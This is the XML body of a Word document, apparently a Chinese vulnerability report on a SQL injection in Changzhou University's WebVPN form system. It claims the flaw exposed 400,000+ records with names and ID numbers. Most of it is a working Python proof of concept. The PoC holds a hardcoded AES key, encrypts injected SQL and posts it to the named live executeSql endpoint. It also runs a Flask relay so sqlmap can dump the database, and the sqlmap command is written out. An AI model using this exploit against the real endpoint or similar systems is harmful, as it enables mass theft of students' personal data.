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2C0E" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常州大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2FD9C" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000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互联网成果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2528326C" w14:textId="77777777" w:rsidR="006C5D1E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1.1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12233087" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成果标题：常州大学_VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0975F8" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成果类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>互联网成果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF9D82" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://zmvpn.cczu.edu.cn/http/webvpnb4628df0d7b77a6d0f08dfc00aa8d59c2c964ac696c57b03b13c3b6f0ee2cb8c/yygj/form/defination/api/executeSql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F945B08" w14:textId="69F6EEB3" w:rsidR="006B5119" w:rsidRDefault="006B5119">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解密后地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://ywtb.cczu.edu.cn/yygj/form/defination/api/executeSql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A6C27" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="0"/>
          <w:szCs w:val="0"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23EB88" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="0"/>
          <w:szCs w:val="0"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0FB8AA" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>成果简要描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常州大学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系统前台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注入导致数据库泄露40W+敏感信息（姓名，身份证等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C4020" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>复现步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4FAD1" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前台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注入，导致40W+敏感信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237130C" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E27525" w14:textId="77777777" w:rsidR="006C5D1E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leftChars="200" w:left="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>import urllib3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Crypto.Cipher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> import AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">from flask import Flask, request, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">session = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests.Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()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KEY = "59zdyEmMqvb2ZkHy".encode("utf-8")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>app = Flask(__name__)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# PKCS7 填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">def pkcs7_pad(data: bytes, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>block_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: int = 16) -&gt; bytes:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w: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pad_len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block_size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(data) % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>block_size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br/>
        <w:t xml:space="preserve">    return data + bytes([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pad_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">] * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pad_len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def pkcs7_unpad(data: bytes) -&gt; bytes:</w:t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pad_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = data[-1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return data[:-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pad_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">]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# 加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>def encrypt(plaintext: str) -&gt; str:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    cipher = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AES.new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(KEY, AES.MODE_ECB) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    padded = pkcs7_pad(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>plaintext.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">("utf-8")) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    encrypted = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cipher.encrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(padded) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return base64.b64encode(encrypted).decode("utf-8")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def deal(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):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/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= encrypt(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br/>
        <w:t xml:space="preserve">    return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def main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data,cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>):</w:t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paramsGet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enlink-vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">": ""} </w:t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rawBody</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = f'{{\"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\":\"{data}\"}}' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    headers = {"Origin": "https://zmvpn.cczu.edu.cn", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Sec-Ch-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>": "\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Not;A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">=Brand\";v=\"99\", \"Microsoft Edge\";v=\"139\", \"Chromium\";v=\"139\"", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "X-Requested-With": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "Accept": "*/*", "Sec-Ch-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-Platform": "\"Windows\"", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Priority": "u=1,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", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Edg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/139.0.0.0", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>": "https://zmvpn.cczu.edu.cn/http/webvpnb4628df0d7b77a6d0f08dfc00aa8d59c2c964ac696</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">c57b03b13c3b6f0ee2cb8c/yygj/form/instance/add?definationId=187d973c385a4077bbc01067cb489bf0&amp;processKey=xsblzzzsq&amp;auth=187d973c385a4077bbc01067cb489bf0_LAUNCH&amp;backFlag=noBack", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Connection": "keep-alive", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Dest": "empty", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Accept-Encoding": "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 xml:space="preserve">, deflate, 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", "Sec-Fetch-Mode": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Accept-Language": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zh-CN,zh;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Sec-Ch-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-Mobile": "?0", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">               "Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json;charset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">=UTF-8"} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "https://zmvpn.cczu.edu.cn/http/webvpnb4628df0d7b77a6d0f08dfc00aa8d59c2c964ac696c57b03b13c3b6f0ee2cb8c/yygj/form/defination/api/executeSql", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        data=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rawBody</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, params=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>paramsGet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, headers=headers, cookies=cookies, verify=False) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>response.status_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 302: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return {"code":302} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return response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# 指定路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>@app.route("/", methods=["POST"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execute_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>request.get_json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br/>
        <w:t xml:space="preserve">    if not data or "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" not in data: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">({"error": "missing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field"}), 400 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/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sql_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = data["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"] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql_value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crypto_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = deal(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1 {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">}") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    result = main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypto_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, cookies=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request.cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)).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() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">({"code": 200, "data": result})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br/>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(debug=True, port=10292) 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lastRenderedPageBreak/>
        <w:br/>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>python sqlmap.py -u "http://127.0.0.1:10292/" --data {\"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\":\"*\"} --batch --headers="Content-Type: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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dbms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br/>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB4F8B7" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
